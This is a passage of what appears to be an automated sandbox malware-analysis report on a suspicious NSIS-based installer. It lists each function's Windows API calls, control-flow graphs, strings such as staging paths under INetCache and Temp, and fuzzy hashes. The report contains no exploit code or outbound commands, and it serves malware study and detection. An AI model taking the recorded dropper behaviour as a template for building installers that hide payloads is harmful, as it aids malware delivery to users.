                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                      • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F1D
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                      • EnableWindow.USER32(?,?), ref: 00404011
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404027
                                                                      • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404046
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                      • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                      • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3282139019-0
                                                                      • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                      • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                      • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                      • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
                                                                      Function 00403987 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 366 403987-40399f call 406671 369 4039a1-4039ac GetUserDefaultUILanguage call 4061de 366->369 370 4039b3-4039ea call 406165 366->370 373 4039b1 369->373 376 403a02-403a08 lstrcatW 370->376 377 4039ec-4039fd call 406165 370->377 375 403a0d-403a36 call 403c5d call 405c74 373->375 383 403ac8-403ad0 call 405c74 375->383 384 403a3c-403a41 375->384 376->375 377->376 390 403ad2-403ad9 call 4062b9 383->390 391 403ade-403b03 LoadImageW 383->391 384->383 385 403a47-403a6f call 406165 384->385 385->383 392 403a71-403a75 385->392 390->391 394 403b84-403b8c call 40140b 391->394 395 403b05-403b35 RegisterClassW 391->395 399 403a87-403a93 lstrlenW 392->399 400 403a77-403a84 call 405b99 392->400 407 403b96-403ba1 call 403c5d 394->407 408 403b8e-403b91 394->408 396 403c53 395->396 397 403b3b-403b7f SystemParametersInfoW CreateWindowExW 395->397 405 403c55-403c5c 396->405 397->394 401 403a95-403aa3 lstrcmpiW 399->401 402 403abb-403ac3 call 405b6c call 406297 399->402 400->399 401->402 406 403aa5-403aaf GetFileAttributesW 401->406 402->383 411 403ab1-403ab3 406->411 412 403ab5-403ab6 call 405bb8 406->412 418 403ba7-403bc1 ShowWindow call 406601 407->418 419 403c2a-403c32 call 4053d2 407->419 408->405 411->402 411->412 412->402 426 403bc3-403bc8 call 406601 418->426 427 403bcd-403bdf GetClassInfoW 418->427 424 403c34-403c3a 419->424 425 403c4c-403c4e call 40140b 419->425 424->408 428 403c40-403c47 call 40140b 424->428 425->396 426->427 431 403be1-403bf1 GetClassInfoW RegisterClassW 427->431 432 403bf7-403c1a DialogBoxParamW call 40140b 427->432 428->408 431->432 435 403c1f-403c28 call 4038d7 432->435 435->405
                                                                      APIs
                                                                        • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                        • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000), ref: 004039A1
                                                                        • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                      • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000), ref: 00403A08
                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403AA6
                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne), ref: 00403AEF
                                                                      • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                      • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                      • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 606308-3242603728
                                                                      • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                      • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                      • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                      • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
                                                                      Function 00402EDD Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 439 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 442 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 439->442 443 402f2d-402f32 439->443 451 403052-403060 call 402e79 442->451 452 402f6b 442->452 444 40310f-403113 443->444 458 403062-403065 451->458 459 4030b5-4030ba 451->459 454 402f70-402f87 452->454 456 402f89 454->456 457 402f8b-402f94 call 40330e 454->457 456->457 465 402f9a-402fa1 457->465 466 4030bc-4030c4 call 402e79 457->466 461 403067-40307f call 403324 call 40330e 458->461 462 403089-4030b3 GlobalAlloc call 403324 call 403116 458->462 459->444 461->459 485 403081-403087 461->485 462->459 490 4030c6-4030d7 462->490 470 402fa3-402fb7 call 405d48 465->470 471 40301d-403021 465->471 466->459 476 40302b-403031 470->476 488 402fb9-402fc0 470->488 475 403023-40302a call 402e79 471->475 471->476 475->476 481 403040-40304a 476->481 482 403033-40303d call 406764 476->482 481->454 489 403050 481->489 482->481 485->459 485->462 488->476 494 402fc2-402fc9 488->494 489->451 491 4030d9 490->491 492 4030df-4030e4 490->492 491->492 495 4030e5-4030eb 492->495 494->476 496 402fcb-402fd2 494->496 495->495 497 4030ed-403108 SetFilePointer call 405d48 495->497 496->476 498 402fd4-402fdb 496->498 502 40310d 497->502 498->476 499 402fdd-402ffd 498->499 499->459 501 403003-403007 499->501 503 403009-40300d 501->503 504 40300f-403017 501->504 502->444 503->489 503->504 504->476 505 403019-40301b 504->505 505->476
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402EEE
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yVVZdG2NJX.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                        • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                        • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yVVZdG2NJX.exe,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\yVVZdG2NJX.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                      • API String ID: 4283519449-1495482793
                                                                      • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                      • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                      • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                      • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D
                                                                      Function 004062B9 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 783 4062b9-4062c4 784 4062c6-4062d5 783->784 785 4062d7-4062ed 783->785 784->785 786 4062f3-406300 785->786 787 406505-40650b 785->787 786->787 788 406306-40630d 786->788 789 406511-40651c 787->789 790 406312-40631f 787->790 788->787 792 406527-406528 789->792 793 40651e-406522 call 406297 789->793 790->789 791 406325-406331 790->791 794 4064f2 791->794 795 406337-406375 791->795 793->792 799 406500-406503 794->799 800 4064f4-4064fe 794->800 797 406495-406499 795->797 798 40637b-406386 795->798 803 40649b-4064a1 797->803 804 4064cc-4064d0 797->804 801 406388-40638d 798->801 802 40639f 798->802 799->787 800->787 801->802 807 40638f-406392 801->807 810 4063a6-4063ad 802->810 808 4064b1-4064bd call 406297 803->808 809 4064a3-4064af call 4061de 803->809 805 4064d2-4064da call 4062b9 804->805 806 4064df-4064f0 lstrlenW 804->806 805->806 806->787 807->802 812 406394-406397 807->812 821 4064c2-4064c8 808->821 809->821 814 4063b2-4063b4 810->814 815 4063af-4063b1 810->815 812->802 817 406399-40639d 812->817 819 4063b6-4063dd call 406165 814->819 820 4063ef-4063f2 814->820 815->814 817->810 832 4063e3-4063ea call 4062b9 819->832 833 40647d-406480 819->833 822 406402-406405 820->822 823 4063f4-406400 GetSystemDirectoryW 820->823 821->806 825 4064ca 821->825 828 406470-406472 822->828 829 406407-406415 GetWindowsDirectoryW 822->829 827 406474-406478 823->827 826 40648d-406493 call 40652b 825->826 826->806 827->826 834 40647a 827->834 828->827 831 406417-406421 828->831 829->828 839 406423-406426 831->839 840 40643b-406451 SHGetSpecialFolderLocation 831->840 832->827 833->826 837 406482-406488 lstrcatW 833->837 834->833 837->826 839->840 842 406428-40642f 839->842 843 406453-40646a SHGetPathFromIDListW CoTaskMemFree 840->843 844 40646c 840->844 845 406437-406439 842->845 843->827 843->844 844->828 845->827 845->840
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063FA
                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 0040640D
                                                                      • SHGetSpecialFolderLocation.SHELL32(00405336,007924D8,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 00406449
                                                                      • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 00406457
                                                                      • CoTaskMemFree.OLE32(007924D8), ref: 00406462
                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                      • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 004064E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 717251189-1230650788
                                                                      • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                      • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                      • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                      • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
                                                                      Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 846 40176f-401794 call 402c41 call 405be3 851 401796-40179c call 406297 846->851 852 40179e-4017b0 call 406297 call 405b6c lstrcatW 846->852 858 4017b5-4017b6 call 40652b 851->858 852->858 861 4017bb-4017bf 858->861 862 4017c1-4017cb call 4065da 861->862 863 4017f2-4017f5 861->863 871 4017dd-4017ef 862->871 872 4017cd-4017db CompareFileTime 862->872 865 4017f7-4017f8 call 405d68 863->865 866 4017fd-401819 call 405d8d 863->866 865->866 873 40181b-40181e 866->873 874 40188d-4018b6 call 4052ff call 403116 866->874 871->863 872->871 875 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 873->875 876 40186f-401879 call 4052ff 873->876 888 4018b8-4018bc 874->888 889 4018be-4018ca SetFileTime 874->889 875->861 908 401864-401865 875->908 886 401882-401888 876->886 890 402ace 886->890 888->889 892 4018d0-4018db CloseHandle 888->892 889->892 894 402ad0-402ad4 890->894 895 4018e1-4018e4 892->895 896 402ac5-402ac8 892->896 898 4018e6-4018f7 call 4062b9 lstrcatW 895->898 899 4018f9-4018fc call 4062b9 895->899 896->890 904 401901-4022fc call 4058fd 898->904 899->904 904->894 908->886 911 401867-401868 908->911 911->876
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017B0
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017D5
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                        • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,774D23A0), ref: 0040535A
                                                                        • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\nsg9061.tmp$C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll$Call
                                                                      • API String ID: 1941528284-840365264
                                                                      • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                      • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                      • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                      • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                      Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 912 406601-406621 GetSystemDirectoryW 913 406623 912->913 914 406625-406627 912->914 913->914 915 406638-40663a 914->915 916 406629-406632 914->916 918 40663b-40666e wsprintfW LoadLibraryExW 915->918 916->915 917 406634-406636 916->917 917->918
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                      • wsprintfW.USER32 ref: 00406653
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
